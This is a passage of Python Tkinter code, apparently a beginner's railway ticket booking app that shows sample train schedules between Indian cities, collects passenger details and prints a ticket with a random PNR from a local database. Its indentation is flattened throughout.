e5.grid(row=0, column=4)
e6.grid(row=0, column=5)
e7.grid(row=0, column=6)
en8.grid(row=1, column=0)
e9.grid(row=1, column=1)
e10.grid(row=1, column=2)
e11.grid(row=1, column=3)
e12.grid(row=1, column=4)
e13.grid(row=1, column=5)
e14.grid(row=1, column=6)
en15.grid(row=2, column=0)
e16.grid(row=2, column=1)
e17.grid(row=2, column=2)
e18.grid(row=2, column=3)
e19.grid(row=2, column=4)
e20.grid(row=2, column=5)
e21.grid(row=2, column=6)
en22.grid(row=3, column=0)
e23.grid(row=3, column=1)
e24.grid(row=3, column=2)
e25.grid(row=3, column=3)
e26.grid(row=3, column=4)
e27.grid(row=3, column=5)
e28.grid(row=3, column=6)
en29.grid(row=4, column=0)
e30.grid(row=4, column=1)
e31.grid(row=4, column=2)
e32.grid(row=4, column=3)
e33.grid(row=4, column=4)
e34.grid(row=4, column=5)
e35.grid(row=4, column=6)
e1.insert(10, "Train Number")
e2.insert(10, "Train Name")
e3.insert(10, "FROM")
e4.insert(10, "Departure Time")
e5.insert(10, "DESTINATION")
e6.insert(10, "Arrival")
e7.insert(10, "Class")
if variable.get() == "Howrah" and variable1.get()== "New Delhi":
en8.insert(10, "12235")
e9.insert(10, "Rajdhani Express")
e10.insert(10, "Howrah")
e11.insert(10, "14:30")
e12.insert(10, "New Delhi")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12236")
e16.insert(10, "Howrah Juntion")
e17.insert(10, "Howrah")
e18.insert(10, "16:30")
e19.insert(10, "New Delhi")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12237")
e23.insert(10, "New Delhi 07")
e24.insert(10, "Howrah")
e25.insert(10, "8:35")
e26.insert(10, "New Delhi")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12238")
e30.insert(10, "Anand Vihar")
e31.insert(10, "Howrah")
e32.insert(10, "12:30")
e33.insert(10, "New Delhi")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Howrah" and variable1.get()== "Chandigarh":
en8.insert(10, "12239")
e9.insert(10, "Howrah Amritsar Express")
e10.insert(10, "Howrah")
e11.insert(10, "6:30")
e12.insert(10, "Chandigarh")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12240")
e16.insert(10, "Kalka Mail")
e17.insert(10, "Howrah")
e18.insert(10, "14:30")
e19.insert(10, "Chandigarh")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12241")
e23.insert(10, "JallianwalaBagh Express")
e24.insert(10, "Howrah")
e25.insert(10, "12:30")
e26.insert(10, "Chandigarh")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12242")
e30.insert(10, "Durgiana Express")
e31.insert(10, "Howrah")
e32.insert(10, "8:30")
e33.insert(10, "Chandigarh")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Lucknow" and variable1.get()== "Chandigarh":
en8.insert(10, "12243")
ach12243=12243
e9.insert(10, "Garibrath")
e10.insert(10, "Lucknow")
e11.insert(10, "9:30")
e12.insert(10, "Chandigarh")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12244")
e16.insert(10, "Mumbai Bandra (T)")
e17.insert(10, "Lucknow")
e18.insert(10, "1:00")
e19.insert(10, "Chandigarh")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12245")
e23.insert(10, "Pooja SF Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "Chandigarh")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12246")
e30.insert(10, "Gandhidham")
e31.insert(10, "Howrah")
e32.insert(10, "14:05")
e33.insert(10, "Chandigarh")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Lucknow" and variable1.get()== "New Delhi":
en8.insert(10, "12247")
and12247=12247
e9.insert(10, "Uttaranchal Express")
e10.insert(10, "Lucknow")
e11.insert(10, "1:40")
e12.insert(10, "New Delhi")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12248")
e16.insert(10, "Rajkot Express")
e17.insert(10, "Lucknow")
e18.insert(10, "6:30")
e19.insert(10, "New Delhi")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12249")
e23.insert(10, "Corbet park link Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "New Delhi")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12250")
e30.insert(10, "Ranikhet Express")
e31.insert(10, "Lucknow")
e32.insert(10, "12:10")
e33.insert(10, "New Delhi")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
if variable.get() == "Ranchi" and variable1.get()== "New Delhi":
en8.insert(10, "12251")
e9.insert(10, "Jan Satabdi Express")
e10.insert(10, "Ranchi")
e11.insert(10, "13:30")
e12.insert(10, "New Delhi")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12252")
e16.insert(10, "Ranchi Express")
e17.insert(10, "Ranchi")
e18.insert(10, "16:30")
e19.insert(10, "New Delhi")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12253")
e23.insert(10, "New Delhi Duronto")
e24.insert(10, "Ranchi")
e25.insert(10, "8:35")
e26.insert(10, "New Delhi")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12254")
e30.insert(10, "Ranchi Road Exp.")
e31.insert(10, "Ranchi")
e32.insert(10, "12:30")
e33.insert(10, "New Delhi")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Ranchi" and variable1.get()== "Chandigarh":
en8.insert(10, "12255")
e9.insert(10, "Ranchi-Amritsar Express")
e10.insert(10, "Ranchi")
e11.insert(10, "6:30")
e12.insert(10, "Chandigarh")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12256")
e16.insert(10, "Kalka Mail")
e17.insert(10, "Ranchi")
e18.insert(10, "14:30")
e19.insert(10, "Chandigarh")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12257")
e23.insert(10, "Aanchal Express")
e24.insert(10, "Ranchi")
e25.insert(10, "12:30")
e26.insert(10, "Chandigarh")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12258")
e30.insert(10, "Samvaad Express")
e31.insert(10, "Ranchi")
e32.insert(10, "8:30")
e33.insert(10, "Chandigarh")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Hatia" and variable1.get()== "Patna":
en8.insert(10, "12259")
ach12259=12259
e9.insert(10, "Sapnarath")
e10.insert(10, "Hatia")
e11.insert(10, "9:30")
e12.insert(10, "Patna")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12260")
e16.insert(10, "Hatia Patna Express")
e17.insert(10, "Hatia")
e18.insert(10, "1:00")
e19.insert(10, "Patna")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12261")
e23.insert(10, "Rajdhani Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "Patna")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12262")
e30.insert(10, "Bodhgaya Express")
e31.insert(10, "Hatia")
e32.insert(10, "14:05")
e33.insert(10, "Patna")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Hatia" and variable1.get()== "Gaya":
en8.insert(10, "12263")
and12263=12263
e9.insert(10, "Chotanagpur Express")
e10.insert(10, "Hatia")
e11.insert(10, "1:40")
e12.insert(10, "Gaya")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12264")
e16.insert(10, "Rajnath Express")
e17.insert(10, "Hatia")
e18.insert(10, "6:30")
e19.insert(10, "Gaya")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12265")
e23.insert(10, "Gaya Hatia link Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "Gaya")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12266")
e30.insert(10, "Maurya Express")
e31.insert(10, "Hatia")
e32.insert(10, "12:10")
e33.insert(10, "Gaya")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
if variable.get() == "Howrah" and variable1.get()== "Patna":
en8.insert(10, "12267")
e9.insert(10, "Rajdhani Express")
e10.insert(10, "Howrah")
e11.insert(10, "14:30")
e12.insert(10, "Patna")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12268")
e16.insert(10, "Howrah Patna Rath")
e17.insert(10, "Howrah")
e18.insert(10, "16:30")
e19.insert(10, "Patna")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12269")
e23.insert(10, "Patna Central Exp.")
e24.insert(10, "Howrah")
e25.insert(10, "8:35")
e26.insert(10, "Patna")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12270")
e30.insert(10, "Vastu Vihar Rath")
e31.insert(10, "Howrah")
e32.insert(10, "12:30")
e33.insert(10, "Patna")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Howrah" and variable1.get()== "Gaya":
en8.insert(10, "12271")
e9.insert(10, "Howrah Gaya Express")
e10.insert(10, "Howrah")
e11.insert(10, "6:30")
e12.insert(10, "Gaya")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12272")
e16.insert(10, "Raftaar Express")
e17.insert(10, "Howrah")
e18.insert(10, "14:30")
e19.insert(10, "Gaya")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12273")
e23.insert(10, "Bodh Gaya Express")
e24.insert(10, "Howrah")
e25.insert(10, "12:30")
e26.insert(10, "Gaya")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12274")
e30.insert(10, "Durrani Express")
e31.insert(10, "Howrah")
e32.insert(10, "8:30")
e33.insert(10, "Gaya")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Lucknow" and variable1.get()== "Patna":
en8.insert(10, "12275")
ach12275=12275
e9.insert(10, "Lucknow Patna Rath")
e10.insert(10, "Lucknow")
e11.insert(10, "9:30")
e12.insert(10, "Patna")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12276")
e16.insert(10, "Lucknow Bengal Rath")
e17.insert(10, "Lucknow")
e18.insert(10, "1:00")
e19.insert(10, "Patna")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12277")
e23.insert(10, "Sandhya Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "Patna")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12278")
e30.insert(10, "Nehru Express")
e31.insert(10, "Lucknow")
e32.insert(10, "14:05")
e33.insert(10, "Patna")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Lucknow" and variable1.get()== "Gaya":
en8.insert(10, "12279")
and12279=12279
e9.insert(10, "Paschim UP Express")
e10.insert(10, "Lucknow")
e11.insert(10, "1:40")
e12.insert(10, "Gaya")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12280")
e16.insert(10, "Raniganj Express")
e17.insert(10, "Lucknow")
e18.insert(10, "6:30")
e19.insert(10, "Gaya")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12281")
e23.insert(10, "Spark Express")
e24.insert(10, "Lucknow")
e25.insert(10, "11:05")
e26.insert(10, "Gaya")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12282")
e30.insert(10, "Chambal Express")
e31.insert(10, "Lucknow")
e32.insert(10, "12:10")
e33.insert(10, "Gaya")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
if variable.get() == "Ranchi" and variable1.get()== "Patna":
en8.insert(10, "12283")
e9.insert(10, "Jan Satabdi Express")
e10.insert(10, "Ranchi")
e11.insert(10, "13:30")
e12.insert(10, "Patna")
e13.insert(10, "7:55")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12284")
e16.insert(10, "Ranchi Juntion")
e17.insert(10, "Ranchi")
e18.insert(10, "16:30")
e19.insert(10, "Patna")
e20.insert(10, "5:50")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12285")
e23.insert(10, "Danapur Cantt Exp.")
e24.insert(10, "Ranchi")
e25.insert(10, "8:35")
e26.insert(10, "Patna")
e27.insert(10, "15:50")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12286")
e30.insert(10, "Bokaro Express")
e31.insert(10, "Ranchi")
e32.insert(10, "12:30")
e33.insert(10, "Patna")
e34.insert(10, "7:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Ranchi" and variable1.get()== "Gaya":
en8.insert(10, "12287")
e9.insert(10, "Ranchi-Chapra Express")
e10.insert(10, "Ranchi")
e11.insert(10, "6:30")
e12.insert(10, "Gaya")
e13.insert(10, "18:20")
e14.insert(10, "1A,2A,3A")
en15.insert(10, "12288")
e16.insert(10, "Jahanabad Rath")
e17.insert(10, "Ranchi")
e18.insert(10, "14:30")
e19.insert(10, "Gaya")
e20.insert(10, "23:30")
e21.insert(10, "1A,2A,3A")
en22.insert(10, "12289")
e23.insert(10, "Rana Express")
e24.insert(10, "Ranchi")
e25.insert(10, "12:30")
e26.insert(10, "Gaya")
e27.insert(10, "8:40")
e28.insert(10, "1A,2A,3A")
en29.insert(10, "12290")
e30.insert(10, "Anuvaad Express")
e31.insert(10, "Ranchi")
e32.insert(10, "8:30")
e33.insert(10, "Gaya")
e34.insert(10, "16:20")
e35.insert(10, "1A,2A,3A")
if variable.get() == "Hatia" and variable1.get()== "New Delhi":
en8.insert(10, "12291")
ach12251=12291
e9.insert(10, "Jannrath")
e10.insert(10, "Hatia")
e11.insert(10, "9:30")
e12.insert(10, "New Delhi")
e13.insert(10, "14:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12292")
e16.insert(10, "Hatia Delhi Express")
e17.insert(10, "Hatia")
e18.insert(10, "1:00")
e19.insert(10, "New Delhi")
e20.insert(10, "00:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12293")
e23.insert(10, "Rajdhani Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "New Delhi")
e27.insert(10, "3:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12294")
e30.insert(10, "Gorakhpur Express")
e31.insert(10, "Hatia")
e32.insert(10, "14:05")
e33.insert(10, "New Delhi")
e34.insert(10, "6:45")
e35.insert(10, "1A,2A")
if variable.get() == "Hatia" and variable1.get()== "Chandigarh":
en8.insert(10, "12295")
and12295=12295
e9.insert(10, "Chambal Express")
e10.insert(10, "Hatia")
e11.insert(10, "1:40")
e12.insert(10, "Chandigarh")
e13.insert(10, "10:40")
e14.insert(10, "1A,2A")
en15.insert(10, "12296")
e16.insert(10, "Yuvraj Express")
e17.insert(10, "Hatia")
e18.insert(10, "6:30")
e19.insert(10, "Chandigarh")
e20.insert(10, "10:45")
e21.insert(10, "1A,2A")
en22.insert(10, "12297")
e23.insert(10, "Chandigarh Hatia link Express")
e24.insert(10, "Hatia")
e25.insert(10, "11:05")
e26.insert(10, "Chandigarh")
e27.insert(10, "20:00")
e28.insert(10, "1A,2A")
en29.insert(10, "12298")
e30.insert(10, "Rajdhani Express")
e31.insert(10, "Hatia")
e32.insert(10, "12:10")
e33.insert(10, "Chandigarh")
e34.insert(10, "21:10")
e35.insert(10, "1A,2A")
def PassengerDetails1():
global x1
if en8.get()=="12235":
x1=12235
elif en8.get()=="12239":
x1=12239
elif en8.get() == "12243":
x1 = 12243
else:
x1 = 12247
def PassengerDetails():
window1.destroy()
window2 = Toplevel(master)
window2.title("Passenger Details")
window2.config(bg="indianred2")
screen_width = window2.winfo_screenwidth()
screen_height = window2.winfo_screenheight()
width = 1020
height = 700
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window2.geometry('%dx%d+%d+%d' % (width, height, x, y))
height = 5
width = 5
for i in range(height): # Rows
for j in range(width): # Columns
e1 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn2 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn3 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
enn4 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e5 = Entry(window2, justify="center", font=('Britannic Bold', 13), bg="lightpink3",fg="blue4")
e6 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn7 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn8 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
enn9 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e10 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e11 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e12 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e13 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e14 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e15 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e16 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e17 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e18 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e19 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e20 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e21 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e22 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e23 = Entry(window2, justify="center", font=('Rockwell Condensed', 11), bg="steelblue3")
e24 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e25 = Entry(window2, justify="center", font=('Rockwell Condensed', 5))
e1.insert(10, "S.no")
enn2.insert(10, "Name")
enn3.insert(10, "Age")
enn4.insert(10, "Gender")
e5.insert(10, "Id_Proof")
e6.insert(10, "1.")
e11.insert(10, "2.")
e16.insert(10, "3.")
e21.insert(10, "4.")
e1.grid(row=0, column=0)
enn2.grid(row=0, column=1)
enn3.grid(row=0, column=2)
enn4.grid(row=0, column=3)
e5.grid(row=0, column=4)
e6.grid(row=1, column=0)
enn7.grid(row=1, column=1)
enn8.grid(row=1, column=2)
enn9.grid(row=1, column=3)
e10.grid(row=1, column=4)
e11.grid(row=2, column=0)
e12.grid(row=2, column=1)
e13.grid(row=2, column=2)
e14.grid(row=2, column=3)
e15.grid(row=2, column=4)
e16.grid(row=3, column=0)
e17.grid(row=3, column=1)
e18.grid(row=3, column=2)
e19.grid(row=3, column=3)
e20.grid(row=3, column=4)
e21.grid(row=4, column=0)
e22.grid(row=4, column=1)
e23.grid(row=4, column=2)
e24.grid(row=4, column=3)
e25.grid(row=4, column=4)
def fun(*args):
enn9.insert(10, v2.get())
def fun1(*args):
e14.insert(10, v3.get())
def fun2(*args):
e19.insert(10, v4.get())
def fun3(*args):
e24.insert(10, v5.get())
def fun4(*args):
e10.insert(10, v6.get())
def fun5(*args):
e15.insert(10, v7.get())
def fun6(*args):
e20.insert(10, v8.get())
def fun7(*args):
e25.insert(10, v9.get())
v2 = StringVar(window2)
gender = {'Male', 'Female'}
v2.set('Choose')
v2.trace("w", fun)
popupMenu1 = OptionMenu(window2, v2, *gender)
popupMenu1.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu1.grid(row=1, column=3)
v3 = StringVar(window2)
gender1 = {'Male', 'Female'}
v3.set('Choose')
v3.trace("w", fun1)
popupMenu2 = OptionMenu(window2, v3, *gender1)
popupMenu2.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu2.grid(row=2, column=3)
v4 = StringVar(window2)
gender2 = {'Male', 'Female'}
v4.set('Choose')
v4.trace("w", fun2)
popupMenu3 = OptionMenu(window2, v4, *gender2)
popupMenu3.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu3.grid(row=3, column=3)
v5 = StringVar(window2)
gender = {'Male', 'Female'}
v5.set('Choose')
v5.trace("w", fun3)
popupMenu4 = OptionMenu(window2, v5, *gender)
popupMenu4.config(font=('Calisto MT', 10), bg="darkgoldenrod3", fg='white')
popupMenu4.grid(row=4, column=3)
v6 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v6.set('Choose')
v6.trace("w", fun4)
popup = OptionMenu(window2, v6, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=1, column=4)
v7 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v7.set('Choose')
v7.trace("w", fun5)
popup = OptionMenu(window2, v7, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=2, column=4)
v8 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v8.set('Choose')
v8.trace("w", fun6)
popup = OptionMenu(window2, v8, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=3, column=4)
v9 = StringVar(window2)
proof = {'Aadhar card', 'Pan card'}
v9.set('Choose')
v9.trace("w", fun7)
popup = OptionMenu(window2, v9, *proof)
popup.config(font=('Calisto MT', 10), bg="light green")
popup.grid(row=4, column=4)
def Check1():
def Show():
global x1,count
window3 = Toplevel(master)
window3.title("Ticket")
screen_width = window3.winfo_screenwidth()
screen_height = window3.winfo_screenheight()
width = 780
height = 480
x = (screen_width / 2) - (width / 2)
y = (screen_height / 2) - (height / 2)
window3.geometry('%dx%d+%d+%d' % (width, height, x, y))
window3.config(bg='gray23')
Label(window3, text="Name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=50)
Label(window3, text="Gender:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=50)
Label(window3, text="Departure time:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=90)
Label(window3, text="Age:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=90)
Label(window3, text="Class:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=130)
Label(window3, text="Train no.:",bg='dark turquoise',font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=130)
Label(window3, text="Train name:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=170)
Label(window3, text="Source:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=210)
Label(window3, text="Destination:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=250)
Label(window3, text="No. of tickets:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=90, y=290)
Label(window3, text="PNR no.:",bg='dark turquoise', font=('Tempus Sans ITC', 11,'bold')).place(x=320, y=170)
Number = Label(window3, justify="center",bg='white',text=count, font=('Slab Serif', 10)).place(x=170, y=290, height=25)
Class = Label(window3, justify="center",bg='white',text=variable2.get(), font=('Slab Serif', 10)).place(x=380, y=130, height=25)
TrainNumber = Label(window3, justify="center",bg='white', font=('Slab Serif', 10))
TrainNumber.place(x=170, y=130, height=25)
global conn, cursor, x1, x2
if x1 == 12235:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12235")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[5],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a=111111
b=999999
pnr=(random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()),int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ",(pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white',text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3,text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(x=170, y=50,height=25)
Age = Label(window3,text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(x=380, y=90, height=25)
Gender = Label(window3,text=data[3] ,bg='white',justify="center", font=('Slab Serif', 9)).place(x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12239:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12239")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[5], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center", text=data[0],bg='white',
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12243:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12243")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5],bg='white', justify="center", font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1],bg='white', justify="center",
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white',text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3], justify="center",bg='white', font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
elif x1 == 12247:
cursor = conn.cursor()
TrainNumber.config(text=x1)
cursor.execute("Select * from Rail88 where Trainnumber=12247")
fetch = cursor.fetchall()
for data in fetch:
Source = Label(window3, text=data[5], justify="center",bg='white', font=('Slab Serif', 10)).place(
x=170, y=170, height=25)
Destination = Label(window3, text=data[2], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=250, height=25)
TrainName = Label(window3, text=data[1], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=180, y=210, height=25)
DepartureTime = Label(window3, text=data[3], justify="center",bg='white',
font=('Slab Serif', 10)).place(x=210, y=90, height=25)
a = 111111
b = 999999
pnr = (random.randint(a, b))
cursor.execute("Insert into Rail999 (pnr,Name,Gender,Age) values (?,?,?,?)",
(pnr, str(enn7.get()), int(enn8.get()), str(enn9.get())))
conn.commit()
cursor.execute("Select * from Rail999 where pnr=? ", (pnr,))
fetch1 = cursor.fetchall()
for data in fetch1:
pnr1 = Label(window3, justify="center",bg='white', text=data[0],
font=('Slab Serif', 9))
pnr1.place(x=380, y=170, height=25)
pnr1.config(text=data[0])
Name = Label(window3, text=data[1],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=170, y=50, height=25)
Age = Label(window3, text=data[2],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=90, height=25)
Gender = Label(window3, text=data[3],bg='white', justify="center", font=('Slab Serif', 9)).place(
x=380, y=50, height=25)
cursor.close()
conn.close()
